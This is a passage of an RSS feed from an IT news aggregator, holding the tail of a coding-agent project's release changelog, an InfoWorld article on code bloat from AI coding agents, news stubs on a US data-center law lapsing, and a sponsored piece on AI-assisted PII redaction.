<li>fix(cli): speed up exit shutdown handlers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671164530" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2745" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2745/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2745">#2745</a></li>
<li>fix(cli): list linked local plugins by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671230064" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2746" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2746/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2746">#2746</a></li>
<li>fix(providers): handle Umans Kimi output caps and web search by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oldschoola/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oldschoola">@oldschoola</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671571838" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2751" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2751/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2751">#2751</a></li>
<li>fix(agent): retry subagent model fallback chains by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671783707" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2753" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2753/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2753">#2753</a></li>
<li>fix(tui): detect CMUX as multiplexer by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pathard1128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pathard1128">@pathard1128</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4672246682" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2755" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2755/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2755">#2755</a></li>
<li>fix(coding-agent): route MuPDF warnings to logger by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4673746131" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2772" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2772/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2772">#2772</a></li>
<li>fix(ai): omit Google AUTO toolConfig by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4674509706" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2782" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2782/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2782">#2782</a></li>
<li>feat(ast): add Emacs Lisp tree-sitter support by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryjm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryjm">@ryjm</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4667318103" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2693" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2693/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2693">#2693</a></li>
<li>fix(ai): unwrap thinking envelopes in raw dumps by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668789863" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2702" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2702/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2702">#2702</a></li>
<li>fix(tool): default Windows bash children to UTF-8 by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4668993321" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2704" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2704/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2704">#2704</a></li>
<li>fix(hashline): drop duplicated JSX boundary echoes by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669256053" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2709" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2709/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2709">#2709</a></li>
<li>fix(providers): preserve OpenRouter upstream routing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669299033" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2710" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2710/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2710">#2710</a></li>
<li>fix(openai-responses): quarantine invalid tool schemas instead of failing the whole turn (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4665238895" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2652" data-hovercard-type="issue" data-hovercard-url="/can1357/oh-my-pi/issues/2652/hovercard" href="https://github.com/can1357/oh-my-pi/issues/2652">#2652</a>) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AsafMah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AsafMah">@AsafMah</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669341536" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2711" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2711/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2711">#2711</a></li>
<li>fix(plugins): resolve directory extension manifest entries one level deep by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AsafMah/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AsafMah">@AsafMah</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4669526068" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2714" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2714/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2714">#2714</a></li>
<li>fix(tui): preserve scrollback while editing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/roboomp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/roboomp">@roboomp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4670384480" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2733" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2733/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2733">#2733</a></li>
</ul>
<h2>New Contributors</h2>
<ul>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sorphwer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sorphwer">@sorphwer</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4671065904" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2741" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2741/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2741">#2741</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pathard1128/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pathard1128">@pathard1128</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4672246682" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2755" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2755/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2755">#2755</a></li>
<li><a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ryjm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ryjm">@ryjm</a> made their first contribution in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4667318103" data-permission-text="Title is private" data-url="https://github.com/can1357/oh-my-pi/issues/2693" data-hovercard-type="pull_request" data-hovercard-url="/can1357/oh-my-pi/pull/2693/hovercard" href="https://github.com/can1357/oh-my-pi/pull/2693">#2693</a></li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/can1357/oh-my-pi/compare/v16.0.1...v16.0.2"><tt>v16.0.1...v16.0.2</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shipping enterprise-quality code with AI agents]]></title>
<description><![CDATA[Developers are caught between the joy — or pressure — of using agents to ship 10x faster today and the dread of how they will maintain that code tomorrow. The gap between “vibe” code and code that can be deployed to millions of users is vast and easy to underestimate. Closing the gap requires car...]]></description>
<link>https://tsecurity.de/de/3601179/ai-nachrichten/shipping-enterprise-quality-code-with-ai-agents/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3601179/ai-nachrichten/shipping-enterprise-quality-code-with-ai-agents/</guid>
<pubDate>Tue, 16 Jun 2026 11:03:48 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Developers are caught between the joy — or pressure — of using agents to ship 10x faster today and the dread of how they will maintain that code tomorrow. The gap between <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html" data-type="link" data-id="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html">“vibe” code</a> and code that can be deployed to millions of users is vast and easy to underestimate. Closing the gap requires care, expertise, and effort, with the payoff coming later. Agents are able to complete increasingly complex programming tasks but without the quality we need. What’s missing, and how can we fill the gap?</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/agentic-coding-quality-gap-sonar.png?w=1024" alt="agentic coding quality gap - sonar" class="wp-image-4182520" width="1024" height="539" sizes="auto, (max-width: 1024px) 100vw, 1024px"></figure><p class="imageCredit">Sonar</p></div>



<h2 class="wp-block-heading"><a></a>Why agent-generated code degrades: the bloat problem</h2>



<p>Enterprise code has to clear three bars: it must be maintainable, reliable, and secure. Out-of-the-box AI agents can miss all three. Let’s focus on the biggest and most visible maintainability issue, which is bloat: redundant validation, defensive checks that cannot fire, near-duplicate functions, dead code that nothing removes. A <code>None</code> check on a parameter typed as <code>dict</code>. A <code>try</code>/<code>except</code> around a call that never throws. Two functions, identical except for the negation in their return statement.</p>



<p>Bloat varies dramatically by model. Sonar’s <a href="https://www.sonarsource.com/the-coding-personalities-of-leading-llms/leaderboard/">LLM Leaderboard</a> runs every frontier model through 4,400+ Java tasks and analyses the code generated. To complete the benchmark, GPT-5.4 High generated 1,159,000 lines of code at an 81.05% pass rate, while Claude Opus 4.7 Thinking generated only 336,000 lines of code to return a better than 82.52% pass rate. Different models generate dramatically different code to achieve similar outcomes.</p>



<p>Bloat is not just messy. <a href="https://arxiv.org/abs/2511.04427">Carnegie Mellon researchers studied</a> 807 open-source projects that had adopted Cursor, matched against 1,380 controls, measured by SonarQube. A short-term velocity gain disappeared by month three, while static analysis warnings rose 30% and code complexity rose 41% — both persistent. The harder it became to change the codebase and the more bugs it contained, the more the velocity was dragged down. Any experienced developer will know how this goes: quality problems compound until the code feels impossible to change and the only option is the dreaded rewrite.</p>



<p>Three forces produce bloat once a model is in use:</p>



<ol class="wp-block-list">
<li><strong>Agents do not feel the maintenance burden.</strong> Armin Ronacher, the creator of Flask, made the point on the <a href="https://newsletter.pragmaticengineer.com/p/building-pi-and-what-makes-self-modifying">Pragmatic Engineer podcast</a> in late April. Humans feel the cost of bad code over time, and as Ronacher put it, “if the pain gets too big, you as a human are incentivized to fix the cause of your pain” — so we refactor. Agents do not. They obliviously extend bad structure indefinitely. A senior engineer’s job is to say no to unnecessary abstraction. The agent has no equivalent reflex.</li>



<li><strong>Training rewards apparent completeness.</strong> Pretraining corpora are full of explanatory material — Stack Overflow answers, tutorials, README snippets — deliberately self-contained and verbose. Post-training compounds the effect: human raters prefer outputs that look thorough, so models learn that “comprehensive” reads as better. When uncertain which edge case matters, the safe move is to handle all of them. Each guard is locally defensible. The aggregate is bloat.</li>



<li><strong>Iterative generation has no deletion pressure.</strong> Agents add but rarely delete. Removing dead code does not make any test go green, so superseded functions accumulate alongside their replacements. <a href="https://arxiv.org/html/2603.24755v1">SlopCodeBench</a>, a March 2026 benchmark across 11 coding models, found rising structural complexity in 80% of trajectories and rising verbosity in 89.8%. Agents continue to patch bad code, treating every task as if it’s their last.</li>
</ol>



<h2 class="wp-block-heading"><a></a>AC/DC: the loop that compensates</h2>



<p>What closes the gap is a loop around each iteration of agent work. The agent does what it is good at — generating code — and our job is to wrap that with three steps the agent cannot reliably do on its own. At Sonar we call this the Agent Centric Development Cycle, or AC/DC: guide, verify, solve.</p>



<h3 class="wp-block-heading"><a></a>Guide</h3>



<p>Many teams overcorrect on context. They paste the style guide, three years of architectural decisions, and the entire onboarding doc into the agent’s instructions and expect output to improve. <a href="https://arxiv.org/abs/2602.11988">ETH Zurich researchers tested</a> this and found the opposite: large context files often reduced task success against no context at all, and added 20% or more to inference cost.</p>



<p>Keep agent-facing context short — under 200 lines is a useful heuristic — and restrict it to fundamentals that can’t easily be inferred from the code: naming conventions, architectural invariants, what has been tried and failed. However, this will only get you so far, so make sure to provide specific context for each task. If you have architectural expectations, don’t expect the agent to guess them. Software architecture tools can be used to provide additional context in the guide phase.</p>



<p>Task shape matters too. Break the work into steps and agree on a plan; ask the agent to provide three solutions and evaluate the impact on quality of each. There is no perfect software architecture, and you understand the trade-offs in your codebase best, so think critically about the changes before they happen. Without this, the agent will confidently pick an option, seemingly at random, and the further it goes the harder it is to “unpick.” If you want to test this, ask three instances of your preferred agent to complete a task that involves some polymorphism and watch each one confidently suggest a different solution.</p>



<h3 class="wp-block-heading"><a></a>Verify</h3>



<p>The most expensive verification mistake is doing it last. Reviewing 200-line pull requests (PRs) after the agent is done is the dynamic behind the <a href="https://addyo.substack.com/p/the-80-problem-in-agentic-coding">Faros/DORA figures Addy Osmani highlighted</a>: 98% more PRs merged in high-adoption teams, review times up 91%. Verification inside the loop is different. Unit test runs, static analysis, and security scanners produce output the agent can act on. This is where AI-native tooling belongs: purpose-built for the agent to invoke, not just for humans to consult through a UI.</p>



<p>Human reviewers cannot keep up. When agents merge twice as many PRs per week and each one takes nearly twice as long to review, doubling the review staff still leaves you behind. Automated verification is the only response that scales. Fast feedback has always been a fundamental tenet of good software engineering. Feeding it directly back to the agent protects the developer from simple mistakes and leaves them headroom to work on the harder ones.</p>



<h3 class="wp-block-heading"><a></a>Solve</h3>



<p>If verification happens within the agentic loop, the agent can fix any issues whilst the code is being generated without expensive remediation steps. Static analysis tools can guide the agent on how to resolve the issue quickly. Some cases need human judgment — a <code>None</code> check at a system boundary may document a real precondition. But most of the work is mechanical. Automate the obvious fixes and let engineers spend their attention on the cases that are not.</p>



<h2 class="wp-block-heading"><a></a>The investment that compounds</h2>



<p>Better models will keep arriving. They may not change the mechanism of bloat or the dynamics of compounding decay. The loop is what does — bounded tasks, sharp context, in-loop verification, and a deliberate “solve” step to clear bloat before it accumulates.</p>



<p>The same logic governs how autonomy should expand. Reduce human interventions only when the agent’s guide, verify, and solve cycle is making them redundant. Our biases can sting us here: an agent’s ability to write code can lead us to agree with it more than we should. Don’t trust blindly; wait for the evidence.</p>



<p>The teams that will be shipping enterprise-quality code with AI agents in 18 months are not the ones running the “best model.” They are the ones treating workflow as the engineering investment, with the seriousness once given to build systems and CI. The model is the tool, the workflow is the discipline. That is where the durable advantage compounds.</p>



<p><em>—</em></p>



<p><a href="https://www.infoworld.com/blogs/new-tech-forum"><strong><em>New Tech Forum</em></strong></a><em><strong> provides a venue for technology leaders—including vendors and other outside contributors—to explore and discuss emerging enterprise technology in unprecedented depth and breadth. The selection is subjective, based on our pick of the technologies we believe to be important and of greatest interest to InfoWorld readers. InfoWorld does not accept marketing collateral for publication and reserves the right to edit all contributed content. Send all </strong></em><em><strong>inquiries to </strong></em><a href="mailto:doug_dineley@foundryco.com"><strong><em>doug_dineley@foundryco.com</em></strong></a><em><strong>.</strong></em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The US Government Is Letting a Key Data Center Regulation Expire]]></title>
<description><![CDATA[The Federal Data Center Enhancement Act (FDCEA) is set to expire in September without an apparent replacement, potentially ending requirements for federal agencies to report on data-center efficiency, resilience, energy and water use, and contractor sustainability. Wired reports: Despite the publ...]]></description>
<link>https://tsecurity.de/de/3600359/it-security-nachrichten/the-us-government-is-letting-a-key-data-center-regulation-expire/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600359/it-security-nachrichten/the-us-government-is-letting-a-key-data-center-regulation-expire/</guid>
<pubDate>Tue, 16 Jun 2026 01:13:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[The Federal Data Center Enhancement Act (FDCEA) is set to expire in September without an apparent replacement, potentially ending requirements for federal agencies to report on data-center efficiency, resilience, energy and water use, and contractor sustainability. Wired reports: Despite the public backlash, the Office of Management and Budget (OMB), the government agency that sets guidance for how agencies implement policies in line with the president's agenda, is not providing any plans for how federal agencies should manage the sunset or continue to implement reporting beyond the timeline of the law. This, current and former workers at OMB and the General Services Administration (GSA) say, signals that the Trump administration is set to take an even more hands-off approach to data center oversight and regulation.
 
A replacement for the requirements laid out in FDCEA would, in other administrations, have been in the works for months ahead of its expiration. An employee with the GSA, the agency that oversees the government's IT services and helps to implement the FDCEA, says that the lack of any sort of plan is highly uncommon. The employee spoke to WIRED on the condition of anonymity for fear of retaliation. "Never in the history of data center policies has a policy expired without another one having been painstakingly worked on for three years behind the scenes," says the GSA employee. "The technology has changed so much it's not about getting everything right, it's about doing the best they can and updating to a new policy. They claim they're going to make sure private companies pay their fare share, but they haven't explained how they'll do that."
 
[...] There has been a burst of data-center-related legislation introduced in Congress this year, from bills that mandate environmental reviews of data centers to bills designed to protect local moratoriums. However, it appears that none of these bills are designed to address the requirements in FDCEA, nor do they specifically address federally run or leased data centers. [...] A search of reginfo.gov, the OMB website that contains reports on the president's Unified Agenda, also turns up nothing for the FDCEA. "By letting this expire, OMB is going to enter into this new age of prioritizing rapid AI development over any sort of centralized control or rigorous standards," says the anonymous GSA employee who spoke to Wired. "In the absence of a new policy from OMB, [GSA] has no directive or measurable standards with which to point agencies towards managing data centers efficiently."<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=The+US+Government+Is+Letting+a+Key+Data+Center+Regulation+Expire%3A+https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F15%2F2017215%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fyro.slashdot.org%2Fstory%2F26%2F06%2F15%2F2017215%2Fthe-us-government-is-letting-a-key-data-center-regulation-expire%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://yro.slashdot.org/story/26/06/15/2017215/the-us-government-is-letting-a-key-data-center-regulation-expire?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How to Use AI to Redact PII in Large Document Sets]]></title>
<description><![CDATA[Between contracts, employee histories, customer files, financial documents, and healthcare records, many organizations are processing larger document volumes than their traditional, manual redaction tools were designed to handle.



Manual redaction is slow, inconsistent, and susceptible to human...]]></description>
<link>https://tsecurity.de/de/3600100/it-nachrichten/how-to-use-ai-to-redact-pii-in-large-document-sets/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3600100/it-nachrichten/how-to-use-ai-to-redact-pii-in-large-document-sets/</guid>
<pubDate>Mon, 15 Jun 2026 21:50:05 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Between contracts, employee histories, customer files, financial documents, and healthcare records, many organizations are processing larger document volumes than their traditional, manual redaction tools were designed to handle.</p>



<p>Manual redaction is slow, inconsistent, and susceptible to human error, which can negatively impact team productivity, put personally identifiable information (PII) at risk of exposure, and create compliance vulnerabilities for your business.</p>



<p>In response to <a href="https://www.gonitro.com/resources/smart-redaction-protecting-pii-in-high-volume-government-records" rel="sponsored">increasing document volume</a> and more stringent PII protection rules, businesses are implementing AI-powered redaction solutions that automate sensitive data detection across large document sets while maintaining human-powered governance and review controls.</p>



<h2 class="wp-block-heading">Why manual PII redaction creates compliance risk</h2>



<p>Traditional document redaction workflows rely on employees manually identifying and redacting sensitive information inside:</p>



<ul class="wp-block-list">
<li>PDFs</li>



<li>Spreadsheets</li>



<li>Emails</li>



<li>Metadata</li>



<li>Comments and annotations</li>



<li>Scanned text</li>



<li>Headers and footers</li>



<li>Embedded objects and attachments</li>
</ul>



<p>This creates compliance risk because it’s easy for employees to overlook hidden or context-specific sensitive information, especially when they’re working under time pressure or with complex files.</p>



<p>Even one missed data point can expose PII, potentially resulting in privacy violations, legal action, or regulatory penalties.</p>



<p>As document volumes grow, teams often have to choose between speed and accuracy—faster manual review increases the likelihood of missed PII, while slower review creates bottlenecks and schedule delays.</p>



<p>Both outcomes increase <a href="https://www.gonitro.com/security-compliance">security and compliance risk</a>:</p>



<ul class="wp-block-list">
<li>Missed PII can expose regulated information protected under privacy laws, contractual obligations, and internal governance policies</li>



<li>Slow review cycles increase the risk of noncompliance with legally mandated response deadlines for audits, litigation, regulatory reporting, and other time-sensitive workflows</li>
</ul>



<h2 class="wp-block-heading">What is AI-powered PII redaction and how does it work?</h2>



<p>AI-powered redaction tools use machine learning, natural language processing, optical character recognition (OCR), and pattern matching to identify and remove sensitive information automatically.</p>



<p>For example, <a href="https://www.gonitro.com/smart-redact">Nitro Smart Redact</a> uses advanced AI-powered PII detection, extensive user controls, and secure data protection to:</p>



<ul class="wp-block-list">
<li>Automatically identify structured and unstructured PII, such as names, addresses, and financial data across diverse document types</li>



<li>Apply permanent redactions by irreversibly removing sensitive content so it can’t be recovered or exposed</li>



<li>Reduce manual review time by automating detection and initial redaction, allowing human reviewers to focus on exceptions and high-risk cases</li>



<li>Apply OCR technology to detect PII inside scanned PDFs and image-based files that are difficult to review manually</li>
</ul>



<h2 class="wp-block-heading">Why human review still matters in AI redaction workflows</h2>



<p>AI is an effective redaction workflow accelerator, but it’s not a replacement for human judgment. People are needed to review context-sensitive information and resolve questionable PII redactions.</p>



<p>Selecting an <a href="https://www.gonitro.com/resources/how-ai-redaction-works-a-deep-dive-into-nitro-smart-redact">AI-powered redaction solution</a> that combines automated PII detection with human-in-the-loop approval processes is the most reliable approach when organizations need to scale document review while maintaining defensibility and governance controls.</p>



<h2 class="wp-block-heading">Best practices for redacting PII in large document sets</h2>



<p>Here are three best practices for scaling PII redaction while balancing automation, security, and compliance oversight.</p>



<p><strong>Use batch processing and workflow automation</strong></p>



<p>AI-powered redaction solutions make it easier for teams to process large volumes of documents by automating detection and redaction across entire document sets at once.</p>



<p>This is especially important for organizations that respond to recurring information requests, audits, investigations, or regulatory inquiries involving thousands of files. Automating redaction across large document sets frees up human reviewers to focus on context-heavy and high-risk cases instead of routine document scanning.</p>



<h3 class="wp-block-heading"><a></a>Establish clear redaction policies</h3>



<p>Clear redaction governance policies equip businesses to standardize redaction practices, improve defensibility during audits or investigations, and reduce the likelihood of sensitive data being exposed through inconsistent manual review processes.</p>



<p>You can reduce ambiguity in your policies by defining:</p>



<ul class="wp-block-list">
<li>Which data types qualify as sensitive</li>



<li>Jurisdiction-specific privacy requirements</li>



<li>Document retention policies</li>



<li>Approval and review responsibilities</li>



<li>When human intervention is required</li>
</ul>



<h3 class="wp-block-heading">Always audit redacted outputs</h3>



<p>Quality assurance reviews improve AI-driven PII detection accuracy while supporting compliance defensibility and internal governance requirements. Scheduling regular audits and document reviews to identify missed redactions and workflow gaps helps validate policy enforcement, reduce PII disclosure risk, and maintain consistent redaction standards across teams and document types.</p>



<h2 class="wp-block-heading"><a></a>How AI-powered solutions help teams manage large-scale redaction</h2>



<p>AI-powered redaction solutions let teams automate repetitive review tasks, improve PII detection consistency, and maintain compliance across large document sets. Organizations that combine AI-assisted detection with human oversight are better positioned to manage sensitive data securely at enterprise scale.</p>



<p>Ready to reduce manual redaction effort and compliance risk? Discover how <a href="https://www.gonitro.com/smart-redact" rel="sponsored">Nitro Smart Redact</a> automates PII detection, redaction, and large-scale document review while supporting human control and decision making when needed.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Feds snooze as US datacenter law set to lapse with no replacement in site]]></title>
<description><![CDATA[Federal Data Center Enhancement Act (FDCEA) of 2023 covers standards including security and sustainability This article has been indexed from www.theregister.com – Articles Read the original article: Feds snooze as US datacenter law set to lapse with no replacement in…
Read more →
The post Feds s...]]></description>
<link>https://tsecurity.de/de/3599835/it-security-nachrichten/feds-snooze-as-us-datacenter-law-set-to-lapse-with-no-replacement-in-site/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599835/it-security-nachrichten/feds-snooze-as-us-datacenter-law-set-to-lapse-with-no-replacement-in-site/</guid>
<pubDate>Mon, 15 Jun 2026 19:27:21 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Federal Data Center Enhancement Act (FDCEA) of 2023 covers standards including security and sustainability This article has been indexed from www.theregister.com – Articles Read the original article: Feds snooze as US datacenter law set to lapse with no replacement in…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/feds-snooze-as-us-datacenter-law-set-to-lapse-with-no-replacement-in-site/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/feds-snooze-as-us-datacenter-law-set-to-lapse-with-no-replacement-in-site/">Feds snooze as US datacenter law set to lapse with no replacement in site</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Feds snooze as US datacenter law set to lapse with no replacement in site]]></title>
<description><![CDATA[Federal Data Center Enhancement Act (FDCEA) of 2023 covers standards including security and sustainability]]></description>
<link>https://tsecurity.de/de/3599761/it-nachrichten/feds-snooze-as-us-datacenter-law-set-to-lapse-with-no-replacement-in-site/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3599761/it-nachrichten/feds-snooze-as-us-datacenter-law-set-to-lapse-with-no-replacement-in-site/</guid>
<pubDate>Mon, 15 Jun 2026 18:48:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Federal Data Center Enhancement Act (FDCEA) of 2023 covers standards including security and sustainability]]></content:encoded>
</item>
<item>
<title><![CDATA[Velvet Ant Hackers Backdoor OpenSSH and PAM to Spy on Critical Infrastructure Network]]></title>
